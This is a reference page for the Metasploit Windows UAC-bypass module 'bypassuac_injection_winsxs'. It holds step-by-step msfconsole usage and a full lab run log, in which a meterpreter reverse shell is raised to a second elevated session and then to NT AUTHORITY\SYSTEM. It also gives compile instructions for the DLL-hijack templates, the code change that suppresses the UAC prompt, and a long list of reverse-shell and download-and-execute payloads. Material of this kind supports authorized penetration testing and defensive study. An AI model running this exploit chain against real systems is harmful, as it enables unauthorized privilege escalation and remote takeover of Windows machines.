Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS - Metasploit


This page contains detailed information about how to use the exploit/windows/local/bypassuac_injection_winsxs metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
Module: exploit/windows/local/bypassuac_injection_winsxs
Source code: modules/exploits/windows/local/bypassuac_injection_winsxs.rb
Disclosure date: 2017-04-06
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off by abusing the way "WinSxS" works in Windows systems. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three seperate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also).

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/windows/local/bypassuac_injection_winsxs
msf exploit(bypassuac_injection_winsxs) > show targets
    ... a list of targets ...
msf exploit(bypassuac_injection_winsxs) > set TARGET target-id
msf exploit(bypassuac_injection_winsxs) > show options
    ... show and set options ...
msf exploit(bypassuac_injection_winsxs) > set SESSION session-id
msf exploit(bypassuac_injection_winsxs) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This module adds a bypass for UAC that relies on DLL hijacking of the dccw.exe process. It has been tested on and supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any versions of Windows 7.

Not Applicable; works on stock Windows releases.

Running Example:

> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set LHOST 
LHOST => 
>  set LPORT 30009
LPORT => 30009
>  show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST              yes       The listen address
   LPORT     30009            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


> run -z
[*] Started reverse TCP handler on :30009 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 
[*] Meterpreter session 1 opened (:30009 -> :50041) at 2017-10-03 12:17:42 -0700
[*] Session 1 created in the background.
> sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 ()
Computer        : WIN10X86-1511
OS              : Windows 10 (Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
> sessions -C ifconfig
[*] Running 'ifconfig' on meterpreter session 1 ()

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  2
============
Name         : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : 2001:0:4137:9e76:38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:73:25:67
MTU          : 1500
IPv4 Address : 
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::cc97:6548:c10a:f034
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  6
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:86a0
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

> sessions -l

Active sessions
===============

  Id  Type                     Information                            Connection
  --  ----                     -----------                            ----------
  1   meterpreter x86/windows  WIN10X86-1511\msfuser @ WIN10X86-1511  :30009 -> :50041 ()

> use exploit/windows/local/bypassuac_injection_winsxs
> set session 1
session => 1
> set target 0
target => 0
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set lhost 
lhost => 
> set lport 30010
lport => 30010
> set verbose true
verbose => true
> show options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST              yes       The listen address
   LPORT     30010            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


> run -j
[*] Exploit running as background job.
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (13 bytes)
[*] Started reverse TCP handler on :30010 
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (12 bytes)
[+] Windows 10 (Build 10586). may be vulnerable.
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Creating temporary folders...
[*] Uploading the Payload DLL to the filesystem...
[*] Payload DLL 18944 bytes long being uploaded...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[*] Injecting  into process ID 3476
[*] Opening process 3476
[*] Injecting struct into 3476
[*] Executing payload
[+] Successfully injected payload in to process: 3476
[*] Sending stage (957487 bytes) to 
[*] Meterpreter session 2 opened (:30010 -> :50078) at 2017-10-03 12:19:03 -0700
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[+] All the dropped elements have been successfully removed
> sessions -l

Active sessions
===============

  Id  Type                     Information                            Connection
  --  ----                     -----------                            ----------
  1   meterpreter x86/windows  WIN10X86-1511\msfuser @ WIN10X86-1511  :30009 -> :50041 ()
  2   meterpreter x86/windows  WIN10X86-1511\msfuser @ WIN10X86-1511  :30010 -> :50078 ()

> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 ()
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 ()
Server username: WIN10X86-1511\msfuser
> sessions -C getsystem
[*] Running 'getsystem' on meterpreter session 1 ()
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[*] Running 'getsystem' on meterpreter session 2 ()
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 ()
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 ()
Server username: NT AUTHORITY\SYSTEM
> exit -y

Compiling Instructions


Compiling Template DLLs

To build the x86 template dll, use data/templates/src/pe/dll_gdiplus/build.sh (Requires mingw-w64 package from apt) cd data/templates/src/pe/dll_gdiplus ./build.sh cp data/templates/src/pe/dll_gdiplus/template_x86_windows.dll data/templates/template_x86_windows_dccw_gdiplus.dll To build the x64 binary (In an x64 VS2013 command prompt) Z:\metasploit-framework\data\templates\src\pe\dll_gdiplus>cl.exe -LD template.c /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain "kernel32.lib" cp data/templates/src/pe/dll_gdiplus/template.dll data/templates/template_x64_windows_dccw_gdiplus.dll

Compiling bypassuac-x86.dll and bypassuac-x64.dll

Open the Visual studio solution located in metasploit-framework/external/source/exploits/bypassuac_injection/ Choose release from the Solution configurations, build the x86 and x64 solutions. The binaries should already be in the right place.

More information


(From PR)

I decided to create a different module and not to update the one called "bypassuac_injection", because in order to perform a DLL hijacking, I need to create several folders in which insert our malicious DLL. Also, I deleted these files and folders in a different way, instead using the method "register_file_for_cleanup()", so as to be able to remove the created folders and also prevent a very large output.

If you want to understand the module in a deeper way I recommend you to visit the C++ project on my github: https://github.com/L3cr0f/DccwBypassUAC

DLL INJECTION


/metasploit-framework/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp /metasploit-framework/data/post/bypassuac-x64.dll /metasploit-framework/data/post/bypassuac-x86.dll

To perform the DLL hijacking we need to copy the file of our interest to a specific location (in our case "C:\Windows\System32\") using IFileOperation. To do so, first we need to inject a DLL that will perform this task. This DLL is almost the same as the one used in the "bypassuac_injection" module, but, in latest Windows 10 systems (build equal or greater than 15003), the IFileOperation must be invoked in a different way so as to not trigger the UAC prompt. This modification will be:

if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)

to

if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)

Note that this modification does not affect other modules. To conclude this section, I didn't found the code of "/metasploit-framework/data/post/bypassuac-[ARCH].exe" to update it.

DLL HIJACKING


/metasploit-framework/data/templates/template_x86_windows_dccw_gdiplus.dll /metasploit-framework/data/templates/template_x64_windows_dccw_gdiplus.dll /metasploit-framework/data/templates/src/pe/dll_gdiplus/template.c /metasploit-framework/data/templates/src/pe/dll_gdiplus/template.h /metasploit-framework/data/templates/src/pe/dll_gdiplus/template.def /metasploit-framework/data/templates/src/pe/dll_gdiplus/template.rc /metasploit-framework/data/templates/src/pe/dll_gdiplus/build.sh /metasploit-framework/lib/msf/core/exploit/exe.rb /metasploit-framework/lib/msf/util/exe.rb

To execute code at high integrity we need to perform a DLL hijacking, but we cannot use the DLL templates provided by Metasploit since we need to forward some functions to the legit DLL, so we need to create a new couple of DLL templates, which are exactly the same but including the forwarding feature (the way I have implemented does not work on Windows 7). Now, despite working in a successfully way, I think it would be great including this forwarding feature on the fly, I mean, without having to create an additional DLL template. I don't know how this can be done, so if you come up with something, let me know.

Also, to load the previous DLL template we have modified the mentioned "exe.rb" files.

Setup the vulnerable environment


The vulnerable environment setup is the same as the module "bypassuac_injection", we need a meterpreter session, select the architecture (0 for x86 and 1 for x64), select the meterpreter payload based on the architecture we want to execute with high integrity and set the regular parameters of the payload (LHOST, LPORT, etc).

Go back to menu.

Msfconsole Usage


Here is how the windows/local/bypassuac_injection_winsxs exploit module looks in the msfconsole:

msf6 > use exploit/windows/local/bypassuac_injection_winsxs

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_injection_winsxs) > show info

       Name: Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
     Module: exploit/windows/local/bypassuac_injection_winsxs
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-04-06

Provided by:
  Ernesto Fernandez "L3cr0f" <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Windows x86
  1   Windows x64

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module will bypass Windows UAC by utilizing the trusted 
  publisher certificate through process injection. It will spawn a 
  second shell that has the UAC flag turned off by abusing the way 
  "WinSxS" works in Windows systems. This module uses the Reflective 
  DLL Injection technique to drop only the DLL payload binary instead 
  of three seperate binaries in the standard technique. However, it 
  requires the correct architecture to be selected, (use x64 for 
  SYSWOW64 systems also).

References:
  https://github.com/L3cr0f/DccwBypassUAC

Module Options


This is a complete list of options available in the windows/local/bypassuac_injection_winsxs exploit:

msf6 exploit(windows/local/bypassuac_injection_winsxs) > show options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

Advanced Options


Here is a complete list of advanced options supported by the windows/local/bypassuac_injection_winsxs exploit:

msf6 exploit(windows/local/bypassuac_injection_winsxs) > show advanced

Module advanced options (exploit/windows/local/bypassuac_injection_winsxs):

   Name                                    Current Setting  Required  Description
   ----                                    ---------------  --------  -----------
   ContextInformationFile                                   no        The information file that contains context information
   DisablePayloadHandler                   false            no        Disable the handler code for the selected payload
   EXE::Custom                                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR                              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack                           false            no        Use the default template in case the specified one is missing
   EXE::Inject                             false            no        Set to preserve the original EXE function
   EXE::OldMethod                          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                                no        The directory in which to look for the executable template
   EXE::Template                                            no        The executable template file name.
   EnableContextEncoding                   false            no        Use transient context when encoding payloads
   FileDropperDelay                                         no        Delay in seconds before attempting cleanup
   MSI::Custom                                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR                              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                no        The directory in which to look for the msi template
   MSI::Template                                            no        The msi template file name
   MSI::UAC                                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   Powershell::encode_final_payload        false            yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false            yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false            yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false            yes       Encrypt PSH with RC4
   Powershell::method                      reflection       yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false            yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true             yes       Execute powershell without interaction
   Powershell::persist                     false            yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true             yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                no        Prepend seconds of sleep
   Powershell::remove_comspec              false            yes       Produce script calling powershell directly
   Powershell::strip_comments              true             yes       Strip comments
   Powershell::strip_whitespace            false            yes       Strip whitespace
   Powershell::sub_funcs                   false            yes       Substitute function names
   Powershell::sub_vars                    true             yes       Substitute variable names
   Powershell::wrap_double_quotes          true             yes       Wraps the -Command argument in single quotes
   VERBOSE                                 false            no        Enable detailed status messages
   WORKSPACE                                                no        Specify the workspace for this module
   WfsDelay                                2                no        Additional delay in seconds to wait for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/local/bypassuac_injection_winsxs module can exploit:

msf6 exploit(windows/local/bypassuac_injection_winsxs) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/local/bypassuac_injection_winsxs exploit:

msf6 exploit(windows/local/bypassuac_injection_winsxs) > show payloads

Compatible Payloads
===================

   #    Name                                                        Disclosure Date  Rank    Check  Description
   -    ----                                                        ---------------  ----    -----  -----------
   0    payload/generic/custom                                                       normal  No     Custom Payload
   1    payload/generic/debug_trap                                                   normal  No     Generic x86 Debug Trap
   2    payload/generic/shell_bind_tcp                                               normal  No     Generic Command Shell, Bind TCP Inline
   3    payload/generic/shell_reverse_tcp                                            normal  No     Generic Command Shell, Reverse TCP Inline
   4    payload/generic/tight_loop                                                   normal  No     Generic x86 Tight Loop
   5    payload/windows/dllinject/bind_hidden_ipknock_tcp                            normal  No     Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   6    payload/windows/dllinject/bind_hidden_tcp                                    normal  No     Reflective DLL Injection, Hidden Bind TCP Stager
   7    payload/windows/dllinject/bind_ipv6_tcp                                      normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   8    payload/windows/dllinject/bind_ipv6_tcp_uuid                                 normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   9    payload/windows/dllinject/bind_named_pipe                                    normal  No     Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   10   payload/windows/dllinject/bind_nonx_tcp                                      normal  No     Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   11   payload/windows/dllinject/bind_tcp                                           normal  No     Reflective DLL Injection, Bind TCP Stager (Windows x86)
   12   payload/windows/dllinject/bind_tcp_rc4                                       normal  No     Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   13   payload/windows/dllinject/bind_tcp_uuid                                      normal  No     Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   14   payload/windows/dllinject/reverse_hop_http                                   normal  No     Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   15   payload/windows/dllinject/reverse_http                                       normal  No     Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
   16   payload/windows/dllinject/reverse_http_proxy_pstore                          normal  No     Reflective DLL Injection, Reverse HTTP Stager Proxy
   17   payload/windows/dllinject/reverse_ipv6_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (IPv6)
   18   payload/windows/dllinject/reverse_nonx_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   19   payload/windows/dllinject/reverse_ord_tcp                                    normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   20   payload/windows/dllinject/reverse_tcp                                        normal  No     Reflective DLL Injection, Reverse TCP Stager
   21   payload/windows/dllinject/reverse_tcp_allports                               normal  No     Reflective DLL Injection, Reverse All-Port TCP Stager
   22   payload/windows/dllinject/reverse_tcp_dns                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (DNS)
   23   payload/windows/dllinject/reverse_tcp_rc4                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   24   payload/windows/dllinject/reverse_tcp_rc4_dns                                normal  No     Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   25   payload/windows/dllinject/reverse_tcp_uuid                                   normal  No     Reflective DLL Injection, Reverse TCP Stager with UUID Support
   26   payload/windows/dllinject/reverse_winhttp                                    normal  No     Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
   27   payload/windows/dns_txt_query_exec                                           normal  No     DNS TXT Record Payload Download and Execution
   28   payload/windows/download_exec                                                normal  No     Windows Executable Download (http,https,ftp) and Execute
   29   payload/windows/exec                                                         normal  No     Windows Execute Command
   30   payload/windows/loadlibrary                                                  normal  No     Windows LoadLibrary Path
   31   payload/windows/messagebox                                                   normal  No     Windows MessageBox
   32   payload/windows/meterpreter/bind_hidden_ipknock_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   33   payload/windows/meterpreter/bind_hidden_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   34   payload/windows/meterpreter/bind_ipv6_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   35   payload/windows/meterpreter/bind_ipv6_tcp_uuid                               normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   36   payload/windows/meterpreter/bind_named_pipe                                  normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   37   payload/windows/meterpreter/bind_nonx_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   38   payload/windows/meterpreter/bind_tcp                                         normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   39   payload/windows/meterpreter/bind_tcp_rc4                                     normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   40   payload/windows/meterpreter/bind_tcp_uuid                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   41   payload/windows/meterpreter/reverse_hop_http                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   42   payload/windows/meterpreter/reverse_http                                     normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   43   payload/windows/meterpreter/reverse_http_proxy_pstore                        normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
   44   payload/windows/meterpreter/reverse_https                                    normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
   45   payload/windows/meterpreter/reverse_https_proxy                              normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   46   payload/windows/meterpreter/reverse_ipv6_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   47   payload/windows/meterpreter/reverse_named_pipe                               normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   48   payload/windows/meterpreter/reverse_nonx_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   49   payload/windows/meterpreter/reverse_ord_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   50   payload/windows/meterpreter/reverse_tcp                                      normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   51   payload/windows/meterpreter/reverse_tcp_allports                             normal  No     Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   52   payload/windows/meterpreter/reverse_tcp_dns                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   53   payload/windows/meterpreter/reverse_tcp_rc4                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   54   payload/windows/meterpreter/reverse_tcp_rc4_dns                              normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   55   payload/windows/meterpreter/reverse_tcp_uuid                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   56   payload/windows/meterpreter/reverse_winhttp                                  normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   57   payload/windows/meterpreter/reverse_winhttps                                 normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
   58   payload/windows/meterpreter_bind_named_pipe                                  normal  No     Windows Meterpreter Shell, Bind Named Pipe Inline
   59   payload/windows/meterpreter_bind_tcp                                         normal  No     Windows Meterpreter Shell, Bind TCP Inline
   60   payload/windows/meterpreter_reverse_http                                     normal  No     Windows Meterpreter Shell, Reverse HTTP Inline
   61   payload/windows/meterpreter_reverse_https                                    normal  No     Windows Meterpreter Shell, Reverse HTTPS Inline
   62   payload/windows/meterpreter_reverse_ipv6_tcp                                 normal  No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
   63   payload/windows/meterpreter_reverse_tcp                                      normal  No     Windows Meterpreter Shell, Reverse TCP Inline
   64   payload/windows/metsvc_bind_tcp                                              normal  No     Windows Meterpreter Service, Bind TCP
   65   payload/windows/metsvc_reverse_tcp                                           normal  No     Windows Meterpreter Service, Reverse TCP Inline
   66   payload/windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  No     Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   67   payload/windows/patchupdllinject/bind_hidden_tcp                             normal  No     Windows Inject DLL, Hidden Bind TCP Stager
   68   payload/windows/patchupdllinject/bind_ipv6_tcp                               normal  No     Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   69   payload/windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  No     Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   70   payload/windows/patchupdllinject/bind_named_pipe                             normal  No     Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   71   payload/windows/patchupdllinject/bind_nonx_tcp                               normal  No     Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   72   payload/windows/patchupdllinject/bind_tcp                                    normal  No     Windows Inject DLL, Bind TCP Stager (Windows x86)
   73   payload/windows/patchupdllinject/bind_tcp_rc4                                normal  No     Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   74   payload/windows/patchupdllinject/bind_tcp_uuid                               normal  No     Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   75   payload/windows/patchupdllinject/reverse_ipv6_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (IPv6)
   76   payload/windows/patchupdllinject/reverse_nonx_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   77   payload/windows/patchupdllinject/reverse_ord_tcp                             normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   78   payload/windows/patchupdllinject/reverse_tcp                                 normal  No     Windows Inject DLL, Reverse TCP Stager
   79   payload/windows/patchupdllinject/reverse_tcp_allports                        normal  No     Windows Inject DLL, Reverse All-Port TCP Stager
